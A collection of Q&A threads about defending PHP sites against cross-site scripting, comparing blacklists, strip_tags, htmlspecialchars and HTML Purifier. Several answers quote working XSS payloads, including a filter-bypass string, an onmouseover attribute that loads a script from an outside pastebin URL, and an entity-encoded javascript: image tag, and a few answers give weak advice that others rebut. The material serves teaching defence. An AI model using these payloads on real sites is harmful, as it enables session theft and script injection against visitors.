New Way To Prevent XSS Attacks - php

I have an entertainment website, and I am thinking of using a new method to prevent XSS attacks. I have created the following word list:
alert(, javascript, <script>,<script,vbscript,<layer>,
<layer,scriptalert,HTTP-EQUIV,mocha:,<object>,<object,
AllowScriptAccess,text/javascript,<link>, <link,<?php, <?import,
Because my site is about entertainment, I do not expect a normal (non-malicious) user to use such words in a comment. So I have decided to remove all of the comma-separated words above from user-submitted strings. I need your advice: do I still need a tool like HTML Purifier after doing this?
Note: I am not using htmlspecialchars() because it would also convert the tags generated by my rich text editor (CKEditor), so the user's formatting would be lost.

Using a blacklist is a bad idea because it is simple to circumvent. For example, you are checking for, and presumably removing, <script>. To circumvent this, a malicious user can enter:
<scri<script>pt>
Your code will strip out the inner <script>, and the pieces around it then join into a new <script> that is saved to the page.
If you need to enter HTML and your users do not, then prevent them from entering HTML. You need a separate method, accessible only to you, for entering articles that contain HTML.
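The bypass described above can be reproduced in a few lines. This is only a sketch: naive_filter() is a hypothetical stand-in for the asker's filter, assumed to remove each blacklisted string in a single pass.

```php
<?php
// Hypothetical single-pass blacklist filter, assumed to behave like the one in the question.
function naive_filter(string $input): string
{
    return str_replace('<script>', '', $input);
}

$payload = '<scri<script>pt>alert(1)</script>';

// The inner "<script>" is removed, and the text on either side of it
// joins up into a brand new "<script>" tag.
echo naive_filter($payload), PHP_EOL;
```

Running the filter in a loop until nothing changes would close this particular hole, but not the many encodings and alternative tags that a blacklist never sees.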

This approach misunderstands what the HTML-injection problem is, and is utterly ineffective.
There are many, many more ways to put scripting in HTML than the above list, and many ways to evade the filter by using escaped forms. You will never catch all potentially "harmful" constructs with this kind of naive sequence blacklisting, and if you try, you will inconvenience users who post genuine comments (e.g. by banning words beginning with on...).
The correct way to prevent HTML-injection XSS is:
use htmlspecialchars() when outputting content that is supposed to be normal text (which is the vast majority of content);
if you need to allow user-supplied HTML markup, whitelist the harmless tags and attributes you wish to allow, and enforce that using HTMLPurifier or another similar library.
This is a standard and well-understood part of writing a web application, and is not difficult to implement.
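As a minimal sketch of the first point, escaping at output time might look like the following. The helper name e() and the sample comment are made up for illustration; htmlspecialchars() and its flags are standard PHP.

```php
<?php
// Hypothetical helper: escapes text for an HTML body or a quoted attribute value.
function e(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$comment = '<script>alert("xss")</script> I <3 this site';

// The markup characters are shown to the reader as text instead of being interpreted.
echo '<p>', e($comment), '</p>', PHP_EOL;
```

Note that the harmless "<3" survives as visible text, which a tag-stripping or word-removing filter would not guarantee.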

Why not just make a function that reverts the changes htmlspecialchars() made for the specific tags you want to be available, such as <b><i><a> etc?
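A rough sketch of that idea, under some assumptions: the function name and tag list are invented here, only exact tags without attributes are restored, and nothing checks that tags are balanced. Links such as <a href> are deliberately left out, because they would need URL validation that this sketch does not attempt.

```php
<?php
// Sketch: escape everything first, then restore only exact, attribute-free tags.
// The default tag list is an assumption chosen for illustration.
function escape_then_restore(string $html, array $tags = ['b', 'i', 'em', 'strong']): string
{
    $escaped = htmlspecialchars($html, ENT_QUOTES, 'UTF-8');
    foreach ($tags as $tag) {
        $escaped = str_replace(
            ["&lt;{$tag}&gt;", "&lt;/{$tag}&gt;"],
            ["<{$tag}>", "</{$tag}>"],
            $escaped
        );
    }
    return $escaped;
}

// A tag carrying an attribute stays escaped; the bare <i> pair is restored.
echo escape_then_restore('<b onmouseover="x">hi</b> <i>ok</i>'), PHP_EOL;
```

Because a tag with any attribute never matches the restore pattern, event handlers and style attributes stay escaped. The output can still contain unbalanced tags, which is one reason a real sanitizer is usually the better choice.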

Hacks to circumvent your list aside, it's always better to use a whitelist than a blacklist.
In this case, you would already have a clear list of tags that you want to support, so just whitelist tags like <em>, <b>, etc, using some HTML purifier.

you can try with
htmlentities()
echo htmlentities("<b>test word</b>");
output: &lt;b&gt;test word&lt;/b&gt;
strip_tags()
echo strip_tags("<b>test word</b>");
output: test word
mysql_real_escape_string()
or try a simple function
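function clean_string($str) {
    // get_magic_quotes_gpc() was removed in PHP 8, and addslashes() protects
    // neither HTML output nor SQL queries, so neither is used here.
    // Once the string is escaped there are no tags left for strip_tags() to remove.
    return htmlspecialchars($str, ENT_QUOTES, 'UTF-8');
}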

Related

PHP "strip_tags" accept all except script

I am creating a page preview that is shown before publishing or saving the page. I noticed that I had forgotten to add the <h1>, <h2>, <h3> etc. tags to the allowed list, so I added them later.
I want to allow ALL HTML tags except the <script> tag, and so far I came up with this list:
public static function tags() {
    return '<p><a><hr><br><table><thead><tbody><tr><td><th><tfoot><span><div><ul><ol><li><img>' .
        '<canvas><video><object><embed><audio><frame><iframe><label><option><select><option>' .
        '<input><textarea><button><form><param><pre><code><small><em><b><u><i><strong><article>' .
        '<aside><bdi><details><summary><figure><figcaption><footer><header><hgroup><mark><meter>' .
        '<nav><progress><ruby><rt><rp><section><time><wbr><track><source><datalist><output><keygen>' .
        '<h1><h2><h3><h4><h5><h6><h7><h8><h9>';
}
So I use this static method like this:
$model->content = strip_tags($_POST['contents'], HTML5Custom::tags());
Have I missed any of the tags there?
I was mostly focusing on AVAILABLE tags in HTML5 specification, and all HTML4 (and lower) tags which are deprecated in HTML5 are not in the list.
Please don't use strip_tags; it is unsafe and unreliable. Read the following discussion of strip_tags to see what you should use instead:
Strip_tags discussion on reddit.com
:: Details of Reddit post ::
What everyone should know about strip_tags()
strip_tags is one of the common go-to functions used for making user input on web pages safe for display. But contrary to what it sounds like it's for, strip_tags is never, ever, ever the right function to use for this and it has a lot of problems. Here's why:
It can eat legitimate text. It turns "This shows that x<y." into "This shows that x", and unless it gets a closing '>' it will continue to eat the rest of the lines in the comment. (It prevents people from discussing HTML, for example.)
It doesn't prevent typed HTML entities. People can (and do) exploit that to bypass word filters & spam filters.
Using the second parameter to allow some tags is 100% dangerous. It starts out innocently: someone wants to permit simple formatting in user comments and does something like this:
$message = strip_tags($message, '<b><i><u>');
But attributes on tags aren't removed. So I could come to your site and post a comment like this:
<b style="color:red;font-size:100pt;text-decoration:blink">hello</b>
Suddenly I can use whatever formatting I want. Or I could do this:
<b style="background:url(http://someserver/transparent.gif);font-weight:normal">hello</b>
Using that I can track users browsing your site without them or you knowing.
Or if I was particularly evil, I could do something like this:
<b onmouseover="s=document.createElement('script');s.src='http://pastebin.com/raw.php?i=j1Vhq2aJ';document.getElementsByTagName('head')[0].appendChild(s)">hello</b>
Using that I could inject my own script into your site, triggered by somebody's cursor moving over my comment. Such a script would run in the user's browser with the full privileges of the page, so it is very dangerous. It could steal or delete private user data. It could alter any part of the page, such as to display fake messages or shock images. It could exploit your site's reputation to trick users into downloading malware. A single comment could even spread across the site rapidly, virally by submitting new comments from the user who views it.
You can't overstate the danger of using that second parameter. If someone cared enough, it could be leveraged to wreak total havoc.
The second parameter doesn't work decently even for known safe text. In older PHP versions, usage like strip_tags('text in which we want line breaks<br/>but no formatting', '<br>') still strips the break because it sees the '/' as part of the tag name.
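Two of the problems listed above are easy to see for yourself. The sample strings below are made up for illustration; the calls are plain strip_tags().

```php
<?php
// Attributes on an allowed tag pass straight through strip_tags().
$comment  = '<b onmouseover="alert(1)">hello</b><script>evil()</script>';
$filtered = strip_tags($comment, '<b>');
echo $filtered, PHP_EOL; // the <script> tags are gone, the onmouseover handler is not

// Text that merely looks like the start of a tag gets eaten.
$sentence = 'This shows that x<y.';
echo strip_tags($sentence), PHP_EOL; // everything from "<" onward is dropped
```

The first case is the dangerous one: the output still carries a live event handler even though the call looks like a whitelist.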
If you simply want to prevent HTML and formatting in user-submitted input, to display text on a web page exactly as typed, the correct function is htmlspecialchars. Follow that with nl2br if you want to display multiple lines; otherwise the text will appear on one line. (Edit: You should know what character set you're using, and if you don't, aim to use UTF-8 everywhere, as it's becoming a web standard. If you're using an unusual character set that is not ASCII-compatible, you must specify it as the third parameter to htmlspecialchars, after the flags, for it to work properly.)
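A minimal sketch of that combination, with a made-up input string and UTF-8 assumed as the character set:

```php
<?php
$typed = "Is x<y?\nSecond line & more";

// Escape first, then turn newlines into <br /> so the line break is the only real markup.
$safe = nl2br(htmlspecialchars($typed, ENT_QUOTES, 'UTF-8'));

echo $safe, PHP_EOL;
```

The order matters: calling nl2br first would let htmlspecialchars escape the inserted <br /> tags as well.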
For when you want to permit formatting, you should use a proper library designed for doing this; such libraries exist for various syntaxes, including HTML, Markdown, BBCode, and Wikitext. Markdown (as used on Reddit) is a user-friendly formatting syntax, but as flyingfirefox has explained below, it allows HTML and is not safe on its own (it is a formatter, not a sanitizer). Use of HTML and/or Markdown for formatting can be made fully safe with a sanitizer like HTML Purifier, which does what strip_tags was supposed to do. BBCode is another option.
If you feel the need to make your own formatter, even a simple one, look at existing implementations to see what they do because there are a surprising number of subtleties involved in making them reliable and safe.
The only appropriate time to use strip_tags would be to remove HTML that was supposed to be there, and now you're converting to a non-HTML format. For example, if you have some content formatted as HTML and now you want to write it to a plain text file, then using strip_tags, followed by htmlspecialchars_decode or html_entity_decode will do that. (In this case, strip_tags won't have the flaw of removing legitimate text because the text should have already been properly escaped as entities when it was made into HTML in the first place.)
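For that one legitimate use, a sketch of the conversion could look like this. The HTML fragment is invented, and it is assumed to be trusted, already well-formed content rather than raw user input.

```php
<?php
// Trusted HTML that was escaped properly when it was written.
$html = '<p>Tom &amp; Jerry say 1 &lt; 2</p>';

// Drop the tags, then turn the entities back into plain characters.
$plain = html_entity_decode(strip_tags($html), ENT_QUOTES, 'UTF-8');

echo $plain, PHP_EOL;
```

The result is plain text and must be escaped again if it is ever echoed into an HTML page.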
Generally, strip_tags is just the wrong function. Never use it. And if you do, absolutely never use the second parameter, because sooner or later someone will abuse it.
In this case it's going to be easier to blacklist than to whitelist; otherwise you'll have to constantly revisit this script and update it.
Also, strip_tags() is unreliable for making HTML safe: it's still possible to inject JavaScript in attributes, e.g. onmouseover="alert('hax');", and it will get past strip_tags() just fine.
My go-to library for HTML filtering/sanitation is HTML Purifier.

How dangerous is it to output certain content without escaping it first

Following on from a question I asked about escaping content when building a custom CMS, I wanted to find out how dangerous not escaping content from the DB can be. Assume the data has been filtered/validated prior to insertion in the DB.
I know it's a best practice to escape output but I'm just not sure how easy or even possible it is for someone to 'inject' a value into page content that is to be displayed.
For example let's assume this content with HTML markup is displayed using a simple echo statement:
<p>hello</p>
Admittedly it won't win any awards as far as content writing goes ;)
My question is: can someone alter that for evil purposes, assuming it was filtered/validated prior to DB insertion?
Always escape for the appropriate context; it doesn't matter if it's JSON or XML/HTML or CSV or SQL (although you should be using placeholders for SQL and a library for JSON), etc.
Why? Because it's consistent. And being consistent is also a form of being lazy: you don't need to ponder if the data is "safe for HTML" because it shouldn't matter. And being lazy (in a good way) is a valuable programming trait. (In this case it's also being lazy about avoiding having to fix "bugs" due to changes in the future.)
Don't omit escaping "because it will never contain data that needs to be escaped" .. because, one day, over a course of a number of situations, that assumption will be wrong.
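To make "escape for the appropriate context" concrete, here is a small sketch that sends the same value to two different contexts. The value is invented; SQL is not shown because, as noted above, placeholders are the right tool there.

```php
<?php
$name = '</script><script>alert(1)</script> O\'Reilly "x"';

// HTML body or quoted attribute context.
$forHtml = htmlspecialchars($name, ENT_QUOTES, 'UTF-8');

// JSON context. The HEX flags also keep <, >, &, ' and " out of the output,
// which matters if the JSON is embedded in an inline <script> block.
$forJson = json_encode($name, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);

echo $forHtml, PHP_EOL;
echo $forJson, PHP_EOL;
```

The same string needs a different encoding in each place, which is why escaping belongs at output time rather than at insertion time.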
If you do not escape your HTML output, one could simply insert scripts into the HTML code of your page - running in the browser of every client that visits your page. It is called Cross-site scripting (XSS).
For example:
<p>hello</p><script>alert('I could run any other Javascript code here!');</script>
In the place of the alert(), you can use basically anything: access cookies, manipulate the DOM, communicate with other servers, et cetera.
Well, this is a very easy way of inserting scripts, and strip_tags can protect against this one. But there are hundreds of more sophisticated tricks, that strip_tags simply won't protect against.
If you really want to store and output HTML, HTMLPurifier could be your solution:
Hackers have a huge arsenal of XSS vectors hidden within the depths of
the HTML specification. HTML Purifier is effective because it
decomposes the whole document into tokens and removing non-whitelisted
elements, checking the well-formedness and nesting of tags, and
validating all attributes according to their RFCs. HTML Purifier's
comprehensive algorithms are complemented by a breadth of knowledge,
ensuring that richly formatted documents pass through unstripped.
It could also be a problem in combination with other vulnerabilities, e.g. SQL injection. An attacker could then bypass the filtering/validation done before insertion into the DB and display whatever they want.
If you are pulling the word hello from the database and displaying it, nothing will happen. If the content contains <script> tags, though, it is dangerous, because a user's cookies can be stolen and used to hijack their session.

how to use textarea tags without opening up security

I know this may sound odd, but I have searched for this, even on Google, without finding what I need.
What is the best approach to allow tags in your textarea boxes without opening up a security hole in your application?
If you are talking about filtering data to protect yourself from XSS attacks, etc., you might want to take a look at HTML Purifier. And please do not consider using regex :)
If you want to allow HTML tags in your textarea, I would recommend strictly restricting the allowable tags. For example, you could allow only "em" or "i" tags. Everything else that you don't need should be filtered out.

people are hacking my filter

I am using a regex to block the words document|window|alert|onmouseover|onclick to prevent XSS, and people seem to be able to bypass it just by typing doc\ument. How do I fix this?
Thanks!
--
Edit: What about preventing XSS server-side? Maybe refuse to serve any file that contains such content in a GET variable?
Obviously, you would have to supply some meaningful detail to get any serious answer for your problem at hand.
As @David Dorward notes, the easiest option is to escape all HTML entities. That disables all HTML, but you don't have to deal with the plight of fighting XSS attacks.
If you need to support HTML, consider using a pre-made anti-XSS filter like HTML Purifier that promises to reliably block such attempts.
HTML Purifier is a standards-compliant HTML filter library written in PHP. HTML Purifier will not only remove all malicious code (better known as XSS) with a thoroughly audited, secure yet permissive whitelist, it will also make sure your documents are standards compliant, something only achievable with a comprehensive knowledge of W3C's specifications.
The simple option is to disallow any HTML and then convert all &, < and > to their respective entities (&amp;, &lt; and &gt;).
The more complicated approach is to run the input through an HTML parser, apply a whitelist to element and attribute names, then serialise it back to HTML.
Is this system at all important/critical?
If so, turn it off immediately and hire a security consultant to secure it for you.
Security is a hard problem. Don't think you can get it right first time, because you won't.
If this is just a system you play around with?
Trying to stop XSS by filtering particular words is a losing battle. If you don't want HTML insertion, just HTML-encode everything. If you do want some HTML, then you need to parse the HTML, make sure it's valid and isn't going to break the page, and only then make sure it doesn't contain any elements or attributes that you don't want.
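A short sketch of why the word filter loses. word_filter() is a hypothetical reconstruction of the regex from the question, and the bypass string is the one the asker reported.

```php
<?php
// Hypothetical word filter modelled on the regex described in the question.
function word_filter(string $input): string
{
    return preg_replace('/document|window|alert|onmouseover|onclick/i', '', $input);
}

// The reported bypass: the backslash splits the word, so the pattern never matches.
$bypass = 'doc\ument.cookie';
var_dump(word_filter($bypass) === $bypass);

// HTML-encoding everything leaves no markup for the browser to interpret,
// whatever words the input contains.
echo htmlspecialchars('<img src=x onerror=alert(1)>', ENT_QUOTES, 'UTF-8'), PHP_EOL;
```

The encoded version needs no list of words to maintain, which is the point of the advice above.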
I had the same problem and asked the question only yesterday. Personally, rather than deleting tags, I created a list of all the tags I did want. I now use the PHP function strip_tags.
strip_tags ( string $str [, string $allowable_tags ] )
Using this command you can simply apply it to your filter like this.
text entered:
<b>Hi</b><malicious tag>
strip_tags("<b>Hi</b><malicious tag>","<b>")
This would output <b>Hi</b>.

How can I allow my user to insert HTML code, without risks? (not only technical risks)

I developed a web application that lets my users manage some aspects of a website dynamically (yes, some kind of CMS) in a LAMP environment (Debian, Apache, PHP, MySQL).
For example, they create a news item in their private area on my server, and it is then published on their website via a cURL request (or via Ajax).
The news item is created with a WYSIWYG editor (FCKeditor at the moment, probably TinyMCE in the near future).
So I can't disallow HTML tags, but how can I be safe?
What kind of tags MUST I delete (JavaScript?)?
That covers being server-safe, but how can I be 'legally' safe?
If a user uses my application to perform XSS, could I get into legal trouble?
If you are using PHP, an excellent solution is HTML Purifier. It has many options to filter out bad stuff and, as a side effect, guarantees well-formed HTML output. I use it to view spam, which can be a hostile environment.
It doesn't really matter what you're looking to remove, someone will always find a way to get around it. As a reference take a look at this XSS Cheat Sheet.
As an example, how are you ever going to remove this valid XSS attack:
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
Your best option is to allow only a subset of acceptable tags and remove anything else. This practice is known as whitelisting and is the best method for preventing XSS (besides disallowing HTML).
Also use the cheat sheet in your testing; fire as much as you can at your website and try to find some ways to perform XSS.
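As a quick check of the point made with the entity-encoded payload above, here is a sketch that runs it past a small blacklist. The three blacklist entries are borrowed loosely from the kind of word list these filters use and are an assumption.

```php
<?php
$payload = '<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>';

// Hypothetical blacklist entries for illustration.
$blacklist = ['javascript', '<script', 'alert('];

// Collect every blacklisted word that literally appears in the payload.
$hits = array_filter(
    $blacklist,
    fn (string $word): bool => stripos($payload, $word) !== false
);

// None of the words appears literally, so the blacklist has nothing to remove.
var_dump(count($hits));

// Escaping does not need to recognise the attack in order to neutralise it.
echo htmlspecialchars($payload, ENT_QUOTES, 'UTF-8'), PHP_EOL;
```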
The general best strategy here is to whitelist specific tags and attributes that you deem safe, and escape/remove everything else. For example, a sensible whitelist might be <p>, <ul>, <ol>, <li>, <strong>, <em>, <pre>, <code>, <blockquote>, <cite>. Alternatively, consider human-friendly markup like Textile or Markdown that can be easily converted into safe HTML.
Rather than allow HTML, you should have some other markup that can be converted to HTML. Trying to strip out rogue HTML from user input is nearly impossible. For example:
<scr<script>ipt etc="...">
Removing <script> from this will leave:
<script etc="...">
Kohana's security helper is pretty good. From what I remember, it was taken from a different project.
However, I tested it with
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
from LFSR Consulting's answer, and it escaped it correctly.
For a C# example of white list approach, which stackoverflow uses, you can look at this page.
If removing the tags is too difficult, you could reject the whole HTML input until the user submits a valid one.
I would reject HTML if it contains any of the following tags:
frameset, frame, iframe, script, object, embed, applet.
You will also want to disallow head (and its sub-tags), body and html, because you provide those yourself and do not want the user to manipulate your metadata.
But generally speaking, allowing users to provide their own HTML code always poses some security risks.
You might want to consider, rather than allowing HTML at all, implementing some standin for HTML like BBCode or Markdown.
I use PHP's strip_tags function because I want users to be able to post safely, and I allow just a few tags in posts. This way nobody can hack your website through script injection, so I think strip_tags is the best option.
It is a very good function in PHP; you can use it like this:
$string = strip_tags($_POST['comment'], "<b>");
